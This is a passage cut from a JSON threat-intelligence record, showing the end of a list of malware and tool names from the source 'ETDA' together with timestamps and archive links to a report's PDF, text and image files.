Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434489, "ts_updated_at": 1775826694, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/999a215477245a6b91cd3f9263228e9f7018a2a1.pdf", "text": "https://archive.orkl.eu/999a215477245a6b91cd3f9263228e9f7018a2a1.txt", "img": "https://archive.orkl.eu/999a215477245a6b91cd3f9263228e9f7018a2a1.jpg" } }